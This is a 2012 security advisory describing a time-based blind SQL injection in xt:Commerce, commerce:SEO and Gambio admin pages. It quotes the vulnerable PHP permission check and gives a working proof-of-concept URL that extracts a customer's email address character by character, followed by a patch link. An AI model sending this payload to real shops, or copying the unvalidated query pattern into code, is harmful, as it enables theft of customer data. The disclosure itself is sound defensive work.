80 lines
No EOL
3.5 KiB
Text
80 lines
No EOL
3.5 KiB
Text
+---------------------------------+
|
|
| xt:Commerce <= v3.04 SP2.1 |
|
|
| commerce:SEO <= v2.1 CE |
|
|
| Gambio <= v2.0.10 SP1.4 |
|
|
| Time Based Blind SQL Injection |
|
|
+---------------------------------+
|
|
|
|
Author.............: Ralf Zimmermann
|
|
Mail...............: info[AT]stoffline.com
|
|
Vendor Homepage....: http://www.xt-commerce.com/
|
|
Software Link......: http://www.xtc-load.de/2008/07/xtcommerce-v304-sp21/
|
|
Affected Version...: xt:Commerce <= v3.04 SP2.1, commerce:SEO <= v2.1 CE, Gambio <= v2.0.10 SP1.4
|
|
URL http://stoffline.com/golb/details-zur-sicherheitslucke-in-xtcommerce/ (german)
|
|
URL http://stoffline.com/golb/sicherheitslucke-in-xtcommerce/ (german)
|
|
Date...............: 12/06/2012
|
|
|
|
-----------------------------------------------------------
|
|
Author will be not responsible for any damage.
|
|
-----------------------------------------------------------
|
|
I. DESCRIPTION
|
|
-----------------------------------------------------------
|
|
|
|
# we need to be logged in as a regular customer...
|
|
|
|
admin/backup.php
|
|
18: require('includes/application_top.php');
|
|
|
|
admin/includes/application_top.php
|
|
399: $current_page = split('\?', basename($_SERVER['PHP_SELF'])); $current_page = $current_page[0]; // for BadBlue(Win32) webserver compatibility
|
|
# if you go to
|
|
# http://127.0.0.1/xtc_304SP21/admin/backup.php/test.php?
|
|
# $current_page = 'test.php' instead of 'backup.php' cause AcceptPathInfo from Apache passes the entire path
|
|
|
|
486: $pagename = strtok($current_page, '.');
|
|
# $pagename = 'test';
|
|
|
|
487: if (!isset($_SESSION['customer_id'])) {
|
|
488: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
|
|
489: }
|
|
# We need to be logged in but we walk through this checkpoint regardless of our customer status
|
|
|
|
491: if (xtc_check_permission($pagename) == '0') {
|
|
492: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
|
|
493: }
|
|
|
|
admin/includes/functions/general.php
|
|
110: function xtc_check_permission($pagename) {
|
|
111: if ($pagename != 'index') {
|
|
112: $access_permission_query = xtc_db_query("select ".$pagename." from ".TABLE_ADMIN_ACCESS." where customers_id = '".$_SESSION['customer_id']."'");
|
|
113: $access_permission = xtc_db_fetch_array($access_permission_query);
|
|
114:
|
|
115: if (($_SESSION['customers_status']['customers_status_id'] == '0')&& ($access_permission[$pagename] == '1')) {
|
|
116: return true;
|
|
117: } else {
|
|
118: return false;
|
|
119: }
|
|
120: } else {
|
|
121: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
|
|
122: }
|
|
123: }
|
|
# $pagename comes in the query with no validation
|
|
# select test from admin_access where customer_id = 2
|
|
|
|
# Every valid SQL query ends with a redirect to the login page.
|
|
# We can use time based MySQL commands like Benchmark to exploit the vulnerability.
|
|
# The PoC checks if the first character from the customers email adress is 'a'.
|
|
# If so, the query will consume a lot of time e.G. 10 seconds, if not, we will directly redirected to the login page
|
|
|
|
-----------------------------------------------------------
|
|
|
|
II. PoC EXPLOIT
|
|
-----------------------------------------------------------
|
|
http://127.0.0.1/xtc_304SP21/admin/backup.php/IF((SELECT%20ASCII(SUBSTR(customers_email_address,1,1))%20FROM%20customers%20WHERE%20customers_id=1)=97,BENCHMARK(100000000,MD5(1)),1)--%20.php?
|
|
-----------------------------------------------------------
|
|
|
|
III. Solution:
|
|
-----------------------------------------------------------
|
|
Patches can be found here:
|
|
http://www.xtc-load.de/2012/06/wichtiges-security-update-fur-alle-xtc-forks/
|
|
----------------------------------------------------------- |